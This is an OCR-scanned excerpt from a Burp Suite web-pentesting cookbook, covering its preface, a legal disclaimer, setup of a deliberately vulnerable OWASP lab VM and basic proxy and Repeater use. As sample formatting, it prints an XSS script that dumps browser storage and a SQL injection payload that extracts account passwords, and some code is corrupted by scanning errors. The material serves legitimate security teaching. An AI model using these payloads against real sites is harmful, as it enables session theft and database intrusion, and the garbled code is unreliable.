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What this book covers 


Chapter 1, Getting Started with Burp Suite, provides setup instructions necessary 
to proceed through the material of the book. 


Chapter 2, Getting to Know the Burp Suite of Tools, begins with establishing the 
Target scope and provides overviews to the most commonly used tools within 
Burp Suite. 


Chapter 3, Configuring, Spidering, Scanning, and Reporting with Burp, helps 
testers to calibrate Burp settings to be less abusive towards the target application. 


Chapter 4, Assessing Authentication Schemes, covers the basics of 
Authentication, including an explanation that this is the act of verifying a person 
or object claim is true. 


Chapter 5, Assessing Authorization Checks, helps you understand the basics of 
Authorization, including an explanation that this how an application uses roles to 
determine user functions. 


Chapter 6, Assessing Session Management Mechanisms, dives into the basics of 
Session Management, including an explanation that this how an application 
keeps track of user activity on a website. 


Chapter 7, Assessing Business Logic, covers the basics of Business Logic 
Testing, including an explanation of some of the more common tests performed 
in this area. 


Chapter 8, Evaluating Input Validation Checks, delves into the basics of Data 
Validation Testing, including an explanation of some of the more common tests 
performed in this area. 


Chapter 9, Attacking the Client, helps you understand how Client-Side testing is 
concerned with the execution of code on the client, typically natively within a 
web browser or browser plugin. Learn how to use Burp to test the execution of 
code on the client-side to determine the presence of Cross-site Scripting (XSS). 


Chapter 10, Working with Burp Macros and Extensions, teaches you how Burp 
macros enable penetration testers to automate events such as logins or response 
parameter reads to overcome potential error situations. We will also learn about 
Extensions as an additional functionality to Burp. 


Chapter 11, Implementing Advanced Topic Attacks, provides a brief explanation 
of XXE as a vulnerability class targeting applications which parse XML and 
SSRF as a vulnerability class allowing an attacker to force applications to make 
unauthorized requests on the attacker’s behalf. 
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Preface 


Burp Suite is a Java-based platform for testing the security of your web 
applications, and has been adopted widely by professional enterprise testers. 

The Burp Suite Cookbook contains recipes to tackle challenges in determining 
and exploring vulnerabilities in web applications. You will learn how to uncover 
security flaws with various test cases for complex environments. After you have 
configured Burp for your environment, you will use Burp tools such as Spider, 
Scanner, Intruder, Repeater, and Decoder, among others, to resolve specific 
problems faced by pentesters. You will also explore working with various modes 
of Burp and then perform operations on the web using the Burp CLI. Toward the 
end, you will cover recipes that target specific test scenarios and resolve them 
using best practices. 

By the end of the book, you will be up and running with deploying Burp for 
securing web applications. 


Who this book is for 


If you are a security professional, web pentester, or software developer who 
wants to adopt Burp Suite for applications security, this book is for you. 


To get the most out of this book 


All the requirements are updated in the Technical requirements section for each 
of the chapter. 


Conventions used 


There are a number of text conventions used throughout this book. 


CodeInText: Indicates code words in text, database table names, folder names, 
filenames, file extensions, pathnames, dummy URLs, user input, and Twitter 
handles. Here is an example: "Allow the attack to continue until you reach 
payload 50." 


A block of code is set as follows: 


<script>try{var m = "";var 1 = window.localStorage; var s = 
window. sessionStorage; for(i=0;i<l.length;i++){var lKey = 1.key(i);m 
+= lKey + "=" + l1.getItem(lKey) + 


"s\n"; };for(i=0;i<s.length;i++){var lKey = s.key(i);m += lKey + "=" 
+ s.getItem(lKey) + 
™\n";};alert(m);}catch(e){alert(e.message) ; }</script> 


Any command-line input or output is written as follows: 


user 't+union+select+concat ('The+password+for+',username, '+is+',+pas 
s 
word) ,mysignature+from+accounts+- -+ 


Bold: Indicates a new term, an important word, or words that you see onscreen. 
For example, words in menus or dialog boxes appear in the text like this. Here is 
an example: "Select a tool from the drop-down listing and click the Lookup Tool 
button." 


Warnings or important notes appear like this. 
Tips and tricks appear like this. 


Sections 


In this book, you will find several headings that appear frequently (Getting 
ready, How to do it..., How it works..., There's more..., and See also). 


To give clear instructions on how to complete a recipe, use these sections as 
follows: 


Getting ready 


This section tells you what to expect in the recipe and describes how to set up 
any software or any preliminary settings required for the recipe. 


How to do it... 


This section contains the steps required to follow the recipe. 


How it works... 


This section usually consists of a detailed explanation of what happened in the 
previous section. 


There's more... 


This section consists of additional information about the recipe in order to make 
you more knowledgeable about the recipe. 


See also 


This section provides helpful links to other useful information for the recipe. 


Get in touch 


Feedback from our readers is always welcome. 


General feedback: If you have questions about any aspect of this book, mention 
the book title in the subject of your message and email us at 
customercare@packtpub.com. 


Errata: Although we have taken every care to ensure the accuracy of our 
content, mistakes do happen. If you have found a mistake in this book, we would 
be grateful if you would report this to us. Please visit www.packt.com/submit- 
errata, selecting your book, clicking on the Errata Submission Form link, and 
entering the details. 


Piracy: If you come across any illegal copies of our works in any form on the 
Internet, we would be grateful if you would provide us with the location address 
or website name. Please contact us at copyright@packt .com with a link to the 
material. 


If you are interested in becoming an author: If there is a topic that you have 
expertise in and you are interested in either writing or contributing to a book, 


please visit authors.packtpub.com. 


Reviews 


Please leave a review. Once you have read and used this book, why not leave a 
review on the site that you purchased it from? Potential readers can then see and 
use your unbiased opinion to make purchase decisions, we at Packt can 
understand what you think about our products, and our authors can see your 
feedback on their book. Thank you! 


For more information about Packt, please visit packt.com. 


Disclaimer 


The information within this book is intended to be used only in an ethical 
manner. Do not use any information from the book if you do not have written 
permission from the owner of the equipment. If you perform illegal actions, you 
are likely to be arrested and prosecuted to the full extent of the law. Packt 
Publishing does not take any responsibility if you misuse any of the information 
contained within the book. The information herein must only be used while 
testing environments with proper written authorizations from appropriate 
persons responsible. 


Targeting legal vulnerable web 
applications 


In order for us to properly showcase the functions of Burp Suite, we need a 
target web application. We need to have a target which we are legally allowed to 
attack. 


“Know Your Enemy” is a saying derived from Sun Tzu's The Art of War. The 
application of this principle in penetration testing is the act of attacking a target. 
The purpose of the attack is to uncover weaknesses in a target which can then be 
exploited. Commonly referred to as ethical hacking, attacking legal targets 
assists companies to assess the level of risk in their web applications. 


More importantly, any penetration testing must be done with express, written 
permission. Attacking any website without this permission can result in litigation 
and possible incarceration. Thankfully, the information security community 
provides many purposefully vulnerable web applications to allow students to 
learn how to hack in a legal way. 


A consortium group, Open Web Application Security Project, commonly 
referred to as OWASP, provides a plethora of resources related to web security. 
OWASP is considered the de facto standard in the industry for all things web 
security-related. Every three years or so, the group creates a listing of the Top 10 
most common vulnerabilities found in web applications. 


See here for more information 


(https://www.owasp.org/index.php/Category: OWASP Top Ten Project). 


Throughout this book, we will use purposefully vulnerable web applications 
compiled into one virtual machine by OWASP. This setup enables us to legally 
attack the targets contained within the virtual machine. 


Getting Started with Burp Suite 


In this chapter, we will cover the following recipes: 


Downloading Burp (Community, Professional) 
Setting up a web app pentesting lab 

Starting Burp at a command line or an executable 
Listening for HTTP traffic, using Burp 


Introduction 


This chapter provides the setup instructions necessary to proceed through the 
material in this book. Starting with downloading Burp, the details include the 
two main Burp editions available and their distinguishing characteristics. 


To use the Burp suite, a penetration tester requires a target application. This 
chapter includes instructions on downloading and installing OWASP 
applications contained within a virtual machine (VM). Such applications will 
be used throughout the book as targeted vulnerable web applications. 


Also included in this chapter is configuring a web browser to use the Burp 
Proxy Listener. This listener is required to capture HTTP traffic between the 
Burp and the target web application. Default settings for the listener include 
an Internet Protocol (IP) address, 127.0.0.1, and port number 8080. 


Finally, this chapter concludes with the options for starting Burp. This includes 
how to start Burp at the command line, also with an optional headless mode, and 
using the executable. 


Downloading Burp (Community, 
Professional) 


The first step in learning the techniques contained within this book is to 
download the Burp suite. The download page is available here 
(https://portswigger.net/burp/). You will need to decide which edition of the Burp 
suite you would like to download from the following: 


e Professional 
e Community 
e Enterprise (not covered) 


What is now termed Community was once labeled Free Edition. You may see 
both referenced on the internet, but they are one and the same. At the time of this 
writing, the Professional edition costs $399. 


To help you make your decision, let's compare the two. The Community version 
offers many of the functions used in this book, but not all. For example, 
Community does not include any scanning functionality. In addition, the 
Community version contains some forced throttling of threads when using the 
Intruder functionality. There are no built-in payloads in the Community version, 
though you can load your own custom ones. And, finally, several Burp 
extensions that require Professional will, obviously, not work in the Community 
edition. 


The Professional version has all functionality enabled including passive and 
active scanners. There is no forced throttled. PortSwigger (that is, the name of 
the company that writes and maintains the Burp suite) provides several built-in 
payloads for fuzzing and brute-forcing. Burp extensions using scanner-related 
API calls are workable in the Professional version as well. 


In this book, we will be using the Professional version, which means much of the 
functionality is available in the Community edition. However, when a feature is 
used in this book specific to the Professional edition, a special icon will indicate 
this. The icon used is the following: 


Burp Suite Professional 


Getting ready 


To begin our adventure together, go to https://portswigger.net/burp and 
download the edition of the Burp suite you wish to use. The page provides a 
slider, as following, which highlights the features of Professional and 
Community, allowing you to compare them: 


Select edition to view features: 


O 


Professional 


Many readers may choose the Community edition to gain familiarity with the 
product prior to purchasing. 


Should you choose to purchase or trial the Professional edition, you will need to 
complete forms or payments and subsequent email confirmations will be sent to 
you. Once your account is created, you may login and perform the download 
from the links provided in our account. 


Software tool requirements 


To complete this recipe, you will need the following: 


e Oracle Java (https://www.java.com/en/download/) 
e Burp Proxy Community or Professional (https://portswigger.net/burp/) 


e Firefox Browser (https://www.mozilla.org/en-US/firefox/new/) 


How to do it... 


After deciding on the edition you need, you have two installation options, 
including an executable or a plain JAR file. The executable is only available in 
Windows and is offered in both 32-bit or 64-bit. The plain JAR file is available 
for Windows, macOS, and Linux. 


The Windows executable is self-contained and will create icons in your program 
listing. However, the plain JAR file requires your platform to have Java 
(https://www.java.com/en/download/) pre-installed. You may choose the current 
version of Java (JRE or JDK) so feel free to choose the latest version: 


Download 


© Download plain JAR file View Checksums 


Download 


Other Platforms ^ 


Ô Download for Linux (64-bit) View Checksums D 


Download 


@ Download for Mac OSX View Checksums 


Download 


tu Download for Windows (32-bit) | vis checksums D 


Download 


Setting up a web app pentesting lab 


The Broken Web Application (BWA) is an OWASP project that provides a self- 
contained VM complete with a variety of applications with known 
vulnerabilities. The applications within this VM enable students to learn about 
web application security, practice and observe web attacks, and make use of 
penetration tools such as Burp. 


To follow the recipes shown in this book, we will utilize OWASP's BWA VM. At 
the time of this writing, the OWASP BWA VM can be downloaded from 


https://sourceforge.net/projects/owaspbwa/files/. 


Getting ready 


We will download the OWASP BWA VM along with supportive tools to create 
our web app pentesting lab. 


Software tool requirements 


To complete this recipe, you will need the following: 


e Oracle VirtualBox (https://www.virtualbox.org/wiki/Downloads) 

o Choose an executable specific to your platform 
Mozilla Firefox Browser (https://www.mozilla.org/en-US/firefox/new/) 
7-Zip file archiver (https://www.7-zip.org/download.html) 
OWASP BWA VM (https://sourceforge.net/projects/owaspbwa/files/) 
Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Oracle Java (https://www.java.com/en/download/) 


How to do it... 


For this recipe, you will need to download the OWASP BWA VM and install it 
by performing the following steps: 


1. Click Download Latest Version from the OWASP BWA VM link provided 
earlier and unzip the file OWASP_Broken_Web_Apps_VM_1.2.7z. 
2. You will be presented with a listing of several files, as follows: 


mf owaspbwa-release-notes.txt 

© OWASP Broken Web Apps-cl1.vmdk 

E OWASP Broken Web Apps-cl1-s001.vmdk 
E OWASP Broken Web Apps-cl1-s002.vmdk 
E OWASP Broken Web Apps-cl1-s003.vmdk 
E OWASP Broken Web Apps-cl1-s004.vmdk 
E OWASP Broken Web Apps-cl1-s005.vmdk 
OWASP Broken Web Apps.vmsd 

A OWASP Broken Web Apps.vmxf 

E] OWASP Broken Web Apps.vmx 

OWASP Broken Web Apps.nvram 


3. All file extensions shown indicate the VM can be imported into Oracle 
VirtualBox or VMware Player/Workstation. For purposes of setting up the 
web application pentesting lab for this book, we will use Oracle VirtualBox. 

4. Make a note of the OWASP Broken Web Apps-c11.vmdk file. Open the 
VirtualBox Manager (that is, the Oracle VM VirtualBox program). 

5. Within the VirtualBox Manager screen, select Machine | New from the top 
menu and type a name for the machine, OWASP BWA. 

6. Set the type to Linux and version to Ubuntu (64-bit), and then click Next, as 
follows: 


Create Virtual Machine 


Name and operating system 


Please choose a descriptive name for the new virtual machine and 
select the type of operating system you intend to install on it. The 
name you choose will be used throughout VirtualBox to identify this 


machine. 


Name: OWASP BWA 


Type: Linux ~ {64} " 
z at 
Version: Ubuntu (64-bit) ~ 
Expert Mode Next Cancel 


7. The next screen allows you to adjust the RAM or leave as suggested. Click 
Next. 

8. On the next screen, choose Use an existing virtual hard disk file. 

9. Use the folder icon on the right to select OWASP Broken Web Apps- 
cli.vmdk file from the extracted list and click Create, as follows: 


© Create Virtual Machine 


Hard disk 


If you wish you can add a virtual hard disk to the new machine. 
You can either create a new hard disk file or select one from the 
list or from another location using the folder icon. 


If you need a more complex storage set-up you can skip this step 
and make the changes to the machine settings once the machine is 


created. 

The recommended size of the hard disk is 10.00 GB. 
© Do not add a virtual hard disk 

© Create a virtual hard disk now 

© Use an existing virtual hard disk file 


OWASP Broken Web Apps-cl1.vmdk (Normal, 8.00 GB) ~ A 


10. Your VM is now loaded in the VirtualBox Manager. Let's make some minor 
adjustments. Highlight the OWASP BWA entry and select Settings from 
the top menu. 

11. Select the Network section in the left-hand pane and change to Host-only 
Adapter. Click OK. 


€g) OWASP BWA - Settings ? x 


= General Network 
System Adapter 1 Adapter2 Adapter3 Adapter 4 
E Display Enable Pee Adapter 
Attached to: Host-only Adapter ~ 
() Storage 


Name: VirtualBox Host-Only Ethernet Adapter - 
ps Audio D> Advanced 


Shared Folders 
User Interface 


12. Now let's start the virtual machine. Right-click then choose Start | Normal 
Start. 


E, æ OWASP BWA 
af @) Powered Off 


cep Settings... Ctrl+S 
e Clone... Ctrl+O 
R Remove... Ctrl+R Display 


re} Group Ctrl+U Video Memory: 
Remote Desktop Se 
SS Gh ; 


13. Wait until the Linux system is fully booted, which may take a few minutes. 
After the booting process is complete, you should see the following screen. 
However, the IP address shown will be different for your machine: 


P 


elcome to the OWASP Broken Web Apps VM 


ttt This YM has many serious security issues. We strongly recommend that you ru 
it only on the “host only” or "NAT" network in the YM settings tt! 


ou can access the web apps at http://192.168.56.101/ 


ou can administer / configure this machine through the console here, by SSHing 
o 192.168.56.101, via Samba at \\192.168.56.1018, or via phpmyadmin at 
ittp: 7/192. 168.56. 101/phpmyadmin. 


In all these cases, you can use username “root” and password "owasphwa". 


NASP Broken Web Applications YM Version 1.2 
og in with username = root and password = owaspbwa 


buaspbwa login: 


JORRA SMB GO Richt cr 


14. The information presented on this screen identifies the URL where you can 
access vulnerable web applications running on the VM. For example, in the 
previous screenshot, the URL is http: //192.168.56.101/. You are given 
a prompt for administering the VM, but it is not necessary to log in at this 


15. 


16. 


time. 

Open the Firefox browser on your host system, not in the VM. Using the 
Firefox Browser on your host machine, enter the URL provided (for 
example, http://192.168.56.101/), where the IP address is specific to 
your machine. 


In your browser, you are presented with an index page containing links to 
vulnerable web applications. These applications will be used as targets 
throughout this book: 


owaspbwa 


OWASP Broken Web Applications Project 


a 


Version 1.2 


This is the VM for the Open Web Application Security Project (OWASP) Broken Web Applications project. It contains many, very 
vulnerable web applications, which are listed below. More information about this project can be found in the project User Guide and Home 


Page 


For details about the known vulnerabilities in these applications, see https://sourceforge net/p/owaspbwaltickets/?limit=999& 
sort= severitytasc. 


TRAINING APPLICATIONS 


Bowasp WebGoat Bowasp WebGoat.NET 
Ê OWASP ESAPI Java SwingSet Interactive O OWASP Mutilidze 1 
O OWASP RailsCoat OWASP Bricks 
OWASP Security Shepherd Ocios 

Ongi Code Injection Rainbow Oswapp 


Oban Vulnerable Web Application 


How it works 


Leveraging a customized virtual machine created by OWASP, we can quickly set 
up a web app pentesting lab containing purposefully vulnerable applications, 
which we can use as legal targets for our exercises throughout this book. 


Starting Burp at a command line or 
as an executable 


For non-Windows users or those Windows users who chose the plain JAR file 
option, you will start Burp at a command line each time they wish to run it. As 
such, you will require a particular Java command to do so. 


In some circumstances, such as automated scripting, you may wish to invoke 
Burp at the command line as a line item in your shell script. Additionally, you 
may wish to run Burp without a graphical user interface (GUD), referred to as 
headless mode. This section describes how to perform these tasks. 


How to do it... 


We will review the commands and actions required to start the Burp Suite 
product: 


1. Start Burp in Windows, after running the installer from the downloaded 
.exe file, by double-clicking the icon on desktop or select it from the 
programs listing: 


| Burp Suite Professional 


4, Burp Suite Professional 


g Burp Suite Professional Uninstaller 


When using the plain JAR file, the executable java is followed by the 
option of -jar, followed by the name of the download JAR file. 


2. Start Burp at the command line (minimal) with the plain JAR file (Java 
must be installed first): 


If you prefer more control over the heap size settings (that is, the amount 
of memory allocated for the program) you may modify the java 
command. 


3. The java executable is followed by the -jar, followed by the memory 
allocation. In this case, 2 GB (that is, 2g) is allocated for read access 
memory (RAM), followed by the name of the JAR file. If you get an error 
to the effect that you cannot allocate that much memory, just drop the 
amount down to something like 1,024 MB (that is, 1024m) instead. 

4. Start Burp at command line (optimize) with the plain JAR file (Java must 
be installed first): 


5. It is possible to start Burp at the command line and to run it in headless 
mode. Headless mode means running Burp without the GUI. 


For the purposes of this book, we will not be running Burp in headless 
mode, since we are learning through the GUI. However, you may require 
this information in the future, which is why it is presented here. 


6. Start Burp at the command line to run in headless mode with the plain JAR 
file (Java must be installed first): 


Note the placement of the parameter -Djava.awt .headless=true 
immediately following the -jar option and before the name of the JAR 
file. 


7. If successful, you should see the following: 


Press Ctrl + C or Ctrl + Z to stop the process. 


8. It is possible to provide a configuration file to the headless mode command 
for customizing the port number and IP address where the proxy listener is 
located. 


Please consult PortSwigger's support pages for more information on this 


topic: https://support.portswigger.net/customer/portal/questions/16805563-burp- 


command-line. 


9. In each startup scenario described, you should be presented with a splash 
screen. The splash screen label will match whichever edition you decided 
to download, either Professional or Community. 

10. You may be prompted to update the version; feel free to do this, if you like. 
New features are constantly added into Burp to help you find 
vulnerabilities, so upgrading the application is a good idea. Choose Update 
Now, if applicable. 


11. Next, you are presented with a dialog box asking about project files and 
configurations: 


© Temporary project 


i New project on disk 


\) Open existing project 


12. If you are using the Community edition, you will only be able to create a 
temporary project. If you are using the Professional edition, create a new 
project on disk, saving it in an appropriate location for you to find. Click 
Next. 


13. The subsequent splash screen asks you about the configurations you would 
like to use. At this point, we don't have any yet, so choose Use Burp 
defaults. As you progress through this book, you may wish to save 
configuration settings and load them from this splash screen in the future, 
as follows: 


2) Select the configuration that you would like to load for this project. BU R OSUITE 
PROFESSIONAL 


Use options saved with project 


O Load from configuration file 


C Defaut to the above in future 
|| Disable extensions —=S _ —— m 
: | Cancel | | Baot | Stat Bu | 


14. Finally, we are ready to click Start Burp. 


How it works... 


Using either the plain JAR file or the Windows executable, you can launch Burp 
to start the Proxy listener to capture HTTP traffic. Burp offers temporary or 
permanent Project files to save activities performed in the suite. 


Listening for HTTP traffic, using 
Burp 


Burp is described as an intercepting proxy. This means Burp sits between the 
user's web browser and the application's web server and intercepts or captures all 
of the traffic flowing between them. This type of behavior is commonly referred 
to as a Proxy service. 


Penetration testers use intercepting proxies to capture traffic flowing between a 
web browser and a web application for the purposes of analysis and 
manipulation. For example, a tester can pause any HTTP request, thus allowing 
parameter tampering prior to sending the request to the web server. 


Intercepting proxies, such as Burp, allow testers to intercept both HTTP requests 
and HTTP responses. This allows a tester to observe the behavior of the web 
application under different conditions. And, as we shall see, sometimes, the 
behaviors are unintended from what the original developer expected. 


To see the Burp suite in action, we need to configure our Firefox browser's 
Network Settings to point to our running instance of Burp. This enables Burp to 
capture all HTTP traffic that is flowing between your browser and the target web 
application. 


Getting ready 


We will configure Firefox browser to allow Burp to listen to all HTTP traffic 
flowing between the browser and the OWASP BWA VM. This will allow the 
proxy service within Burp to capture traffic for testing purposes. 


Instructions are available on PortSwigger at 
(https://support.portswigger.net/customer/portal/articles/1783066-configuring- 
firefox-to-work-with-burp) and we will also step through the process in the 
following recipe. 


How to do it... 


The following are the steps you can go through to listen to all HTTP traffic 
using Burp: 


1. 
2. 


3. 


Open the Firefox browser and go to Options. 

In the General tab, scroll down to the Network Proxy section and then click 
Settings. 

In the Connection Settings, select Manual proxy configuration and type in 
the IP address of 127.0.0.1 with port 8080. Select the Use this proxy server 
for all protocols checkbox: 


Make sure the No proxy for the textbox is blank, as shown in the following 
screenshot, and then click OK: 


Connection Settings 


Configure Proxy Access to the Internet 
No proxy 

O Auto-detect proxy settings for this network 
Use system proxy settings 

@ Manual proxy configuration 


HTTP Proxy 127.0.0.1 


V Use this proxy server for all protocols 


SSL Proxy 127.0.0.1 Port 8080 
FTP Proxy 127.0.0.1 Port 8080 
SOCKS Host 127.0.0.1 Port 8080 


SOCKSv4 @ SOCKS v5 


No Proxy for 


Example: mozilla.org, .net.nz, 192.168.1.0/24 


Automatic proxy configuration URL 


OK Cancel Help 


5. With the OWASP BWA VM running in the background and using Firefox to 
browse to the URL specific to your machine (that is, the IP address shown 


on the Linux VM in VirtualBox), click the reload button (the arrow in a 
circle) to see the traffic captured in Burp. 


6. If you don't happen to see any traffic, check whether Proxy Intercept is 
holding up the request. If the button labeled Intercept is on is depressed, as 
shown in the following screenshot, then click the button again to disable the 
interception. After doing so, the traffic should flow freely into Burp, as 
follows: 


Burp Intruder Repeater Window Help 


HTTP history | WebSockets history 
Forward Drop Action 


Raw Hex 


In the following, Proxy | Intercept button is disabled: 
Burp Intruder Repeater Window Help 
Target Spider | Scanner | Intruder | Repeater | Sequencer 


HTTP history | WebSockets history | Options 


Forward Drop Intercept is off Action 


Raw Hex 


7. If everything is working properly, you will see traffic on your Target | Site 
map tab similar to what is shown in the following screenshot. Your IP 
address will be different, of course, and you may have more items shown 
within your Site map. Congratulations! You now have Burp listening to all 
of your browser traffic! 


Burp Intruder Repeater VVindo 


Proxy | Spider | Sca 


Lb! 

[> animatedcollapse js 
> D images 

C index.css 

C jauery.min.js 


How it works... 


The Burp Proxy service is listening on 127.0.0.1 port 8080. Either of these 
settings can be changed to listen on an alternative IP address or port number. 
However, for the purpose of learning, we will use the default settings. 


Getting to Know the Burp Suite of 
Tools 


In this chapter, we will cover the following recipes: 


e Setting the Target Site Map 
Understanding Message Editor 
Repeating with Repeater 
Decoding with Decoder 
Intruding with Intruder 


Introduction 


This chapter provides overviews of the most commonly used tools within Burp 
Suite. The chapter begins by establishing the Target scope within the Target Site 
Map. This is followed by an introduction to the Message Editor. Then, there will 
be some hands-on recipes using OWASP Mutillidae II to get acquainted with 
Proxy, Repeater, Decoder, and Intruder. 


Software tool requirements 


To complete the recipes in this chapter, you will need the following: 


e Burp Proxy Community or Professional (https://portswigger.net/burp/) 
e The Firefox browser configured to allow Burp to proxy traffic 


(https://www.mozilla.org/en-US/firefox/new/) 


Setting the ‘Target Site Map 


Now that we have traffic flowing between your browser, Burp, and the OWASP 
BWA virtual machine, we can begin setting the scope of our test. For this recipe, 
we will use the OWASP Mutillidae IT link 
(http://<Your_VM_Assigned_IP_Address>/mutillidae/) available in the 
OWASP BWA VM as our target application. 


Looking more closely at the Target tab, you will notice there are two subtabs 
available: Site map and Scope. From the initial proxy setup between your 
browser, Burp, and the web server, you should now have some URLs, folders, 
and files shown in the Target | Site map tab. You may find the amount of 
information overwhelming, but setting the scope for our project will help to 
focus our attention better. 


Getting ready 


Using the Target | Site map and Target | Scope tab, we will assign the URL for 
mutillidae (http: //<Your_VM_Assigned_IP_Address>/mutillidae/) as 


the scope. 


How to do it... 


Execute the following steps to set the Target Site Map: 


1. Search for the folder mutillidae and right-click on Add to scope. Notice 
the brief highlighting of the Target | Scope subtab, as follows: 


Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 


> http://1-liner.org 
Y  http://192.168.56.101 
D 
> D AppSensorDemo 
> m ESAPLJava-SwingSet-interactive 


q Contents 
Host 


http://192.168.56 


O MCR http://192.168.56 
O OWASP-CSRFGuard-Test-Application.html http://192.168.56 
[L WackoPicko http://192.168.56 
> D WebGoat http://192.168.56 
[À animatedcollapse.js http://192.168.56 
> D awstats http://192.168.56 
E bWaAPP http://192.168.56 
> D bodceit http://192.168.56 
> on cyclone ——— 


B dom-xss-example.html 

Ba Sin e 
D gallery2 ———— 
D getboo [ Raw | Heade 
Ai shost TET /mutilli 
E gruyere Host: 192.16 
D gtd-php User-Agent: ] 
[4 hackxor_intro.php Firefox/61.0 
O joomla Seema: text 
Bi jquery.min js Accept-Langu 
[O mandiant-struts-forms.p*= as 

O mono D http:/192.168.56.104/mutillidae 

D mutilidae Add to scope 


Spider this branch 


2. Upon adding the folder mutillidae to your scope, you may be presented 
with a Proxy history logging dialog box, as follows. You may choose to 
avoid collecting messages out of your cope by clicking Yes. Or you may 
choose to continue to have the Proxy HTTP History table collect any 
messages passing through Burp, even if those messages fall outside the 
scope you've identified. For our purposes, we will select Yes: 


[2] You have added an item to Target scope. Do you want Burp Proxy 
=- to stop sending out-of-scope items to the history or other Burp 
tools? 


Answering “yes” will avoid accumulating project data for 
out-of-scope items. 


0] Always take the same action in future | Yes | No 


3. Flipping over the Target | Scope tab, you should now see the full URL for 
the OWASP Mutillidae II, shown in the Include in scope table, as follows: 


Define the in-scope targets for your current work. This configuration affects the behavior of tools throughout the suite. 
URL paths. 


C Use advanced scope control 


w http.//192.168.56.101/mutillidae 


EEUHE, 
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£ 
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How it works... 


The Message Editor displays detailed information any HTTP message flowing 
through the Proxy listener. After setting up Proxy to capture HTTP traffic, as 
seen in your Target | Site map and Burp Proxy | HTTP history tab, you are able 
to select any single message to reveal the Message Editor. Each editor contains 
the request and response sides of the message, so long as the message is properly 
proxied through Burp. 


Understanding the Message Editor 


On almost every tool and tab within Burp Suite that display an HTTP message, 
you will see an editor identifying the request and response. This is commonly 
referred to as the Message Editor. The Message Editor allows viewing and 
editing HTTP requests and responses with specialties. 


Within the Message Editor are multiple subtabs. The subtabs for a request 
message, at a minimum, include the following: 


e Raw 
e Headers 
e Hex 


The subtabs for a response message include the following: 


Raw 

Headers 

Hex 

HTML (sometimes) 
Render (sometimes) 


The Raw tab gives you the message in its raw HTTP form. The Headers tab 
displays HTTP header parameters in tabular format. The parameters are editable, 
and columns can be added, removed, or modified in the table within tools such 
as Proxy and Repeater. 


For requests containing parameters or cookies, the Params tab is present. 
Parameters are editable, and columns can be added, removed, or modified in the 
table within tools such as Proxy and Repeater. 


Finally, there's the Hex tab, which presents the message in hexadecimal format; 
it is, in essence, a hex editor. You are permitted to edit individual bytes within 
tools such as Proxy and Repeater, but those values must be given in two-digit 
hexadecimal form, from 00 through FF. 


Getting ready 


Let's explore the multiple tabs available in the Message Editor for each request 
and response captured in Burp. 


How to do it... 


Ensure you have traffic flowing between your browser, Burp, and the OWASP 
BWA virtual machine. 


1. Looking at the Target | Site map tab, notice the Message Editor section: 


| Request | Response | 
| Raw | Headers | Hex | 


GET /mutillidae/ HTTP/1.1 

Host: 192.168.56.101 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWGE4) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 
Safari/537.36 

Accept: 

text/html, application/xhtmltxml, application/xml;q=0.9,*/*;q=0 
.8 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

Referer: http: //192.168.56.101/ 

Connection: close 

Upgrade-Insecure-Requests: 1 


2. When viewing a request, note that the subtabs available include Raw, 
Headers, and Hex, at a minimum. However, in the case of a request 
containing parameters or cookies, the Params subtab is also available: 


login.php 
Cookie showhints 1 

Cookie PHPSESSID juttplah3jsrpg6h03di4go4d2 
Cookie acopendivids swingset jotto phpbb2 redmine 
Cookie acgroupswithpersist nada 

Body username admin 

Body password adminpass 
login-php-submit-button Login 


Body encoding: application/x-ww w-form-urlencoded 


3. The other side of the message is the Response tab, containing the Raw, 
Headers, Hex subtabs, and sometimes HTML and Render. These are the 
various formats provided for the HTTP response to the request. If the 
content is HTML, then the tab will appear. Likewise, the Render tab 
enables HTML display as it would be presented in a browser but without 
any JavaScript executed: 


HTITP/1.1 200 OK 

Date: Mon, 27 Aug 2018 11:07:03 GMT 

server: Apache/2.2.14 (Ubuntu) mod mono/2.4.3 
PHP/5.3.2-lubuntu4.30 with Suhosin-Patch proxy html/3.0.1 
mod python/3.3.1 Python/?t.6.5 mod _ssl/2.2.14 Opens5L/0.9.8k 
Phusion Passenger/4.0.38 mod perl/2.0.4 Perl/v5.10.1 
X-Powered-By: PHP/5.3.2-lubuntud. 30 

Logged-In-User: 

Vary: Accept-Encoding 

Content-Length: 50373 

Connection: close 

Content-Type: text/html 


Repeating with Repeater 


Repeater allows for slight changes or tweaks to the request, and it is displayed in 
the left-hand window. A Go button allows the request to be reissued, and the 
response is displayed in the right-hand window. 


Details related to your HTTP request include standard Message Editor details 
such as Raw, Params (for requests with parameters or cookies), Headers, and 
Hex. 


Details related to the HTTP Response include standard Message Editor details 
including Raw, Headers, Hex, and, sometimes, HTML and Render. 


At the bottom of each panel is a search-text box, allowing the tester to quickly 
find a value present in a message. 


Getting ready 


Repeater allows you to manually modify and then re-issue an individual HTTP 
request, analyzing the response that you receive. 


How to do it... 


1. From the Target | Site map or from Proxy | HTTP history tabs (shown in 
the following screenshot), right-click a message and select Send to 
Repeater: 


et |p ter | sae [tee ge Set te [coma | tte 


Logging of out-of-scope Proxy 
| Fiter: Hiding CSS, image and general binary content 
# A) tos Method [URL (Params | Edited =| Status 
1 http: 92.168.56.101 GET | 200 
3 hitps/192.168.56.104 GET  animatedcolapse js 200 
4 hittp://192.168.56.101 GET  fpuery.min.js 200 
10 http:/192.168.56.101 GET  /mutilidae 301 


= 
[raen [tr 


GET /mutillidae/ HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOWE4) AppleWebRin Sendto Spider 
Accept: text/html, application/xhtultxml, application/xml;q=0) Doan active scan 
Accept-Language: en-U5,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http: //192. 168.56. 101/ Send to Intruder 
Connection: close 
Upgrade-Insecure-Requests: 1 


Do a passive scan 


Send to Repeater 
Send to Sequencer 
Send to Comparer 


2. Switch over to the Repeater tab. Note the HTTP Request is ready for the 
tester to tweak parameters, and then send the request to the application via 
the Go button. 


Note the search boxes at the bottom of each panel: 


GET /autillidae/ HTTP/1.1 
Host: 192.168. 56.101 
User-Agent: Morilla/5.0 (Windows HT 10.0; W0Wed) AppleWebFit/537.3¢ (KHTML, like 
Gecko) Chrome/é2.0.3202.9 Safari/537. 36 

